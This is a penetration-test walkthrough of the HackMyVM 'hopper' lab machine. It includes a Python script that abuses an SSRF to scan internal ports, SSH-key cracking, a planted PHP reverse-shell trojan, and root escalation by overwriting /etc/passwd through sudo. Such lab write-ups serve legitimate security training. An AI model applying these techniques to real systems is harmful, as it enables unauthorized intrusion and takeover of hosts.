当前位置:网站首页>hackmyvm-hopper预排
hackmyvm-hopper预排
2022-08-02 03:59:00 【xdeclearn】
hackmyvm: hopper
Information collected to get the first shell
PORT STATE SERVICE22/tcp open ssh80/tcp open httpFull port scan, first visit the web service.
Use gobuster to scan the directory to find the directory advanced-search, ssrf exists here.
The virtual machine has three users who can log in with bash, root, edward, henry.
After a simple test, remote file inclusion cannot be performed. It is estimated that curl_exec is called. For the ssrf utilization of php, please refer to SSRF in PHP[1] to use it.But here is a bit special, there is no redis, no mysql, so the host port is probed.
#!/usr/bin/python3import requestsfor port in range(1,65535):res = requests.get('http://192.168.143.191/advanced-search/path.php?path=http://127.0.0.1:%d' % port)if len(res.text) == 0:continueelse:print('-----------------------')print('port %d\n' % port)print(res.text)print('-----------------------')The new port obtained by scanning is 2222.
Followed by directory discovery, blasting the directory, and finding the existence of the directorybackup.
It was found to be a passpharse sshkey, so use john to decrypt, seeJTR (John The Ripper)'s ssh key crack record[2], the passpharse is barcelona.
Use id_rsa to log in ssh to successfully log in useredwardGet user flag.
Switch user
Write a PHP Trojan that bounces the shell into the /var/www/html directory, and successfully obtained the user www-data.
Check that the user has sudo privileges.
Reference GTFOBins[3], switch to user henry (note that the environment variable export TERM=xterm needs to be set before running the program).
Elevate to root
View sudo permissions for user henry.
This is relatively simple, change /etc/passwd.
Copy passwd to the tmp directory and replace x in the root user with a known encrypted password.
Then use the command [email protected]:/tmp$ sudo /usr/bin/ascii-xfr -rv /etc/passwd 
Reference
[1] https://blog.csdn.net/bylfsj/article/details/105083164
[2] https://blog.csdn.net/qq_40490088/article/details/97812715
[3] https://gtfobins.github.io/
边栏推荐
猜你喜欢
GreenOptic: 1 vulnhub walkthrough
13.JS输出内容和语法
IP access control: teach you how to implement an IP firewall with PHP
第一次手撕代码,如何解出全排列问题
(4) Function, Bug, Class and Object, Encapsulation, Inheritance, Polymorphism, Copy
PHP基金会三月新闻公告发布
TCP communications program
VIKINGS: 1 vulnhub walkthrough
SQL classification, DQL (Data Query Language), and corresponding SQL query statement demonstration
IO流、 编码表、 字符流、 字符缓冲流
随机推荐
QR code generation API interface, which can be directly connected as an A tag
Alfa: 1 vulnhub walkthrough
PHP 给图片添加全图水印
Function hoisting and variable hoisting
解决 Zlibrary 卡死/找不到域名/达到限额问题,Zlibrary最新地址
Orasi: 1 vulnhub walkthrough
(2)Thinkphp6模板引擎**标签
Query the indexes of all tables in the database and parse them into sql
kali安装IDEA
hackmyvm: may walkthrough
(7) 浅学 “爬虫” 过程 (概念+练习)
CTF入门笔记之ping
TypeScript 错误 error TS2469、error TS2731 解决办法
DarkHole: 2 vulnhub walkthrough
宝塔邮局邮箱设置成功后能发送不能接收问题处理
14.JS语句和注释,变量和数据类型
17.JS条件语句和循环,以及数据类型转换
New usage of string variable parsing in PHP8.2
[sebastian/diff]一个比较两段文本的历史变化扩展库
Eric靶机渗透测试通关全教程